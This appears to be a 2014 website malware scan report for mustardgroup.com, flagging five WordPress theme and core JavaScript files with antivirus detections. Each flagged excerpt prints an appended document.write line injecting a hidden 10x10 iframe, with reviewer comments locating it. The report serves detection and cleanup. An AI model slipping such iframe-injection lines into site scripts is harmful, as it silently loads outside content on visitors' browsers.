
Malware Scanner report for mustardgroup.com

Malicious/Suspicious/Total urls checked
5/0/17
5 of the 17 checked URLs contain malicious code (all five are JavaScript files). See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/10
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://mustardgroup.com/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
clean
http://www.mustardgroup.com/
200 OK
Content-Length: 19400
Content-Type: text/html
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-1.7.min.js?ver=3.4
200 OK
Content-Length: 94157
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cA(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cx(a){if(!cm[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cn||(cn=c.createElement("iframe"),cn.frameBorder=cn.width=cn.height=0),b.appendChild(cn);if(!co||!cn.createElement)co=(cn.contentWindow||cn.contentDocument).document,co.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),co.close();d=c
... 3222 bytes are skipped ...
unction(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bI,"").replace(bN,bY[1]+"document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Bkav
W32.HfsIframe.C8e5

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-ui.min.js?ver=3.4
200 OK
Content-Length: 202012
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/preloader.js?ver=3.4
200 OK
Content-Length: 2022
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.fancybox-1.3.4.js?ver=3.4
200 OK
Content-Length: 29535
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



;(function($) {
var tmp, loading, overlay, wrap, outer, content, close, title, nav_left, nav_right,

selectedIndex = 0, selectedOpts = {}, selectedArray = [], currentIndex = 0, currentOpts = {}, currentArray = [],

ajaxLoader = null, imgPreloader = new Image(), imgRegExp = /\.(jpg|gif|png|bmp|jpeg)(.*)?$/i, swfRegExp = /[^\.]\.(swf)\s*$/i,

loadingTimer, loadingFrame = 1,

titleHeight = 0, titleStr = '', start_pos, final_pos, busy
... 3706 bytes are skipped ...
true,
enableKeyboardNav : true,

onStart : function(){},
onCancel : function(){},
onComplete : function(){},
onCleanup : function(){},
onClosed : function(){},
onError : function(){}
};

$(document).ready(function() {
$.fancybox.init();
});

})(jQuery);
// NOTE(review): this statement sits after the plugin's closing `})(jQuery);`, so it runs on every page
// that loads the script and writes a 10x10 iframe into the document. It is presumably the appended
// line behind the detections listed below; confirm by diffing against the original plugin file.
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLP [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V1112
Kaspersky
HEUR:Trojan.Script.Generic

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.twitter.js?ver=3.4
200 OK
Content-Length: 3299
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.nivo.slider.js?ver=3.4
200 OK
Content-Length: 25418
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



(function($) {

var NivoSlider = function(element, options){
var settings = $.extend({}, $.fn.nivoSlider.defaults, options);

var vars = {
currentSlide: 0,
currentImage: '',
totalSlides: 0,
randAnim: '',
running: false,
paused: false,
stop: false
};

var slider = $(element); <
... 3544 bytes are skipped ...
lAdvance: false,
captionOpacity: 0.8,
prevText: 'Prev',
nextText: 'Next',
beforeChange: function(){},
afterChange: function(){},
slideshowEnd: function(){},
lastSlide: function(){},
afterLoad: function(){}
};

$.fn._reverse = [].reverse;

})(jQuery);
// NOTE(review): trailing statement outside the slider's `(function($) { ... })(jQuery);` wrapper.
// It writes a 10x10 iframe at load time and looks like an appended line rather than plugin code;
// verify against a known-good copy of the plugin before restoring the file.
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.bgslider.js?ver=3.4
200 OK
Content-Length: 1911
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.quicksand.js?ver=3.4
200 OK
Content-Length: 14834
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function ($) {
$.fn.quicksand = function (collection, customOptions) {
var options = {
duration: 750,
easing: 'swing',
attribute: 'data-id', adjustHeight: 'auto', useScaling: true, enhancement: function(c) {}, selector: '> *',
dx: 0,
dy: 0
};
$.extend(options, customOptions);

if ($.browser.msi
... 3366 bytes are skipped ...

$dest.remove();
options.enhancement($sourceParent); for (i = 0; i < animationQueue.length; i++) {
animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback);
}
});
};
})(jQuery);
// NOTE(review): statement placed after the plugin's closing `})(jQuery);`. It writes a 10x10 iframe
// into the page when the script loads; presumably the injected line the scanners below matched.
// Confirm by comparing the served file with the original plugin source.
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Avast
JS:Includer-BB [Trj]
Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Sophos
Mal/Iframe-AN
GData
JS:Includer-BB

http://www.mustardgroup.com/wp-content/themes/empire/js/farbtastic.js?ver=3.4
200 OK
Content-Length: 7825
Content-Type: text/javascript
clean
http://mustardgroup.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:34 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 13 Aug 2014 01:18:34 GMT
Set-Cookie: PHPSESSID=463734en5t70ubhairhgiesuu5; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
clean
http://www.mustardgroup.com/test404page.js
404 Not Found
Content-Length: 17450
Content-Type: text/html
clean
http://www.mustardgroup.com/about-us/
200 OK
Content-Length: 19427
Content-Type: text/html
clean
http://www.mustardgroup.com/wp-includes/js/comment-reply.js?ver=3.4
200 OK
Content-Length: 923
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// addComment: comment-reply helper object.
//   moveForm(d, f, i, c) looks up the elements with ids d and i, leaves a hidden
//   "wp-temp-form-div" placeholder where element i was, re-inserts element i directly after
//   element d, sets the "comment_parent" field to f (and "comment_post_ID" to c when both exist),
//   and wires the cancel link to move the element back and remove the placeholder.
//   I(a) is shorthand for document.getElementById(a).
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}};
// NOTE(review): the statement below is not part of the addComment object. It writes a 10x10 iframe
// into every page that loads this script. The identical statement also ends the four other flagged
// excerpts in this report, so it is presumably what the detections match. Confirm by diffing this
// file against the copy shipped with the matching WordPress release.
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

http://www.mustardgroup.com/management/
200 OK
Content-Length: 20132
Content-Type: text/html
clean
http://www.mustardgroup.com/mustard-group/
200 OK
Content-Length: 17932
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mustardgroup.com

Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com

Result:
The result is similar to the first query; no suspicious redirects were found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mustardgroup.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mustardgroup.com/

Result: mustardgroup.com is not infected or malware details are not published yet.